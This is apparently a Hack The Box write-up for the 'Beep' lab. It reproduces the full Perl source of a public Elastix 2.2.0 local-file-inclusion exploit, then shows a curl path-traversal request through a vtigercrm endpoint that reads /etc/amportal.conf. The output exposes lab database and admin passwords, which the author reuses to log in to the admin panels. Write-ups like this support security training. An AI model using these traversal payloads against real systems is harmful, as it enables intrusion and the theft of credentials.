LFI
┌──(kali㉿kali)-[~/archive/htb/labs/beep]
└─$ searchsploit Elastix Local File Inclusion
------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------- ---------------------------------
Elastix 2.2.0 - 'graph.php' Local File Inclusion | php/webapps/37637.pl
------------------------------------------------------------- ---------------------------------
shellcodes: No Results
papers: No ResultsThere was also a LFI vulnerability for Elastix This is a spray-n-pray type of situation that I am in as I have not confirmed the version of the Elastix.
Exploit
┌──(kali㉿kali)-[~/archive/htb/labs/beep]
└─$ searchsploit -x php/webapps/37637.pl
Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
URL: https://www.exploit-db.com/exploits/37637
Path: /usr/share/exploitdb/exploits/php/webapps/37637.pl
Codes: N/A
Verified: True
File Type: ASCII textsource: https://www.securityfocus.com/bid/55078/info
Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
Elastix 2.2.0 is vulnerable; other versions may also be affected.
#!/usr/bin/perl -w
#------------------------------------------------------------------------------------#
#Elastix is an Open Source Sofware to establish Unified Communications.
#About this concept, Elastix goal is to incorporate all the communication alternatives,
#available at an enterprise level, into a unique solution.
#------------------------------------------------------------------------------------#
############################################################
# Exploit Title: Elastix 2.2.0 LFI
# Google Dork: :(
# Author: cheki
# Version:Elastix 2.2.0
# Tested on: multiple
# CVE : notyet
# romanc-_-eyes ;)
# Discovered by romanc-_-eyes
# vendor http://www.elastix.org/
print "\t Elastix 2.2.0 LFI Exploit \n";
print "\t code author cheki \n";
print "\t 0day Elastix 2.2.0 \n";
print "\t email: anonymous17hacker{}gmail.com \n";
#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
use LWP::UserAgent;
print "\n Target: https://ip ";
chomp(my $target=<STDIN>);
$dir="vtigercrm";
$poc="current_language";
$etc="etc";
$jump="../../../../../../../..//";
$test="amportal.conf%00";
$code = LWP::UserAgent->new() or die "inicializacia brauzeris\n";
$code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action";
$res = $code->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~ 'This file is part of FreePBX') {
print "\n read amportal.conf file : $answer \n\n";
print " successful read\n";
}
else {
print "\n[-] not successful\n";
}It would appear that /etc/amportal.conf%00&module=Accounts&action contains important information
Fail
┌──(kali㉿kali)-[~/archive/htb/labs/beep]
└─$ perl 37637.pl
Elastix 2.2.0 LFI Exploit
code author cheki
0day Elastix 2.2.0
email: anonymous17hacker{}gmail.com
target: https://ip 10.10.10.7
[-] not successfulThe exploit itself does not work. Likely implying that the running instance of Elastix isn’t 2.2.0
But …
Success through VTigerCRM LFI
As the exploit code suggests, /etc/amportal.conf%00&module=Accounts&action appears to contain valuable information.
Upon looking it up on Google, I found out that the amportal.conf file is the configuration file used by the Asterisk Management Portal (AMP) in the Elastix. The file contains various settings for AMP, such as the database connection information, the login credentials for the AMP web interface, and other system-wide settings. In general, this file contains sensitive information such as credentials and settings, and should be protected and only accessible by authorized personnel.
Since I have a valid LFI with VTiger CRM, I maybe able to the file through that
┌──(kali㉿kali)-[~/archive/htb/labs/beep]
└─$ curl -s --insecure 'https://beep.localdomain/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00&module=Accounts&action' | grep -i -v '^#'
AMPDBHOST=localhost
AMPDBENGINE=mysql
AMPDBUSER=asteriskuser
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE
AMPBIN=/var/lib/asterisk/bin
AMPSBIN=/usr/local/sbin
AMPWEBROOT=/var/www/html
AMPCGIBIN=/var/www/cgi-bin
FOPWEBROOT=/var/www/html/panel
FOPPASSWORD=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
AUTHTYPE=database
AMPADMINLOGO=logo.png
AMPEXTENSIONS=extensions
ENABLECW=no
ZAP2DAHDICOMPAT=true
MOHDIR=mohmp3
AMPMODULEXML=http://mirror.freepbx.org/
AMPMODULESVN=http://mirror.freepbx.org/modules/
AMPDBNAME=asterisk
ASTETCDIR=/etc/asterisk
ASTMODDIR=/usr/lib/asterisk/modules
ASTVARLIBDIR=/var/lib/asterisk
ASTAGIDIR=/var/lib/asterisk/agi-bin
ASTSPOOLDIR=/var/spool/asterisk
ASTRUNDIR=/var/run/asterisk
ASTLOGDIR=/var/log/asteriskIt worked.
The file indeed contains the DB connection information including the credential; asteriskuser:jEhdIekWmdjE
It also contains the admin credential for web GUI’ admin:jEhdIekWmdjE
There is password re-use
I am now able to login to Elastix admin GUI panel.
Same goes for FreePBX as well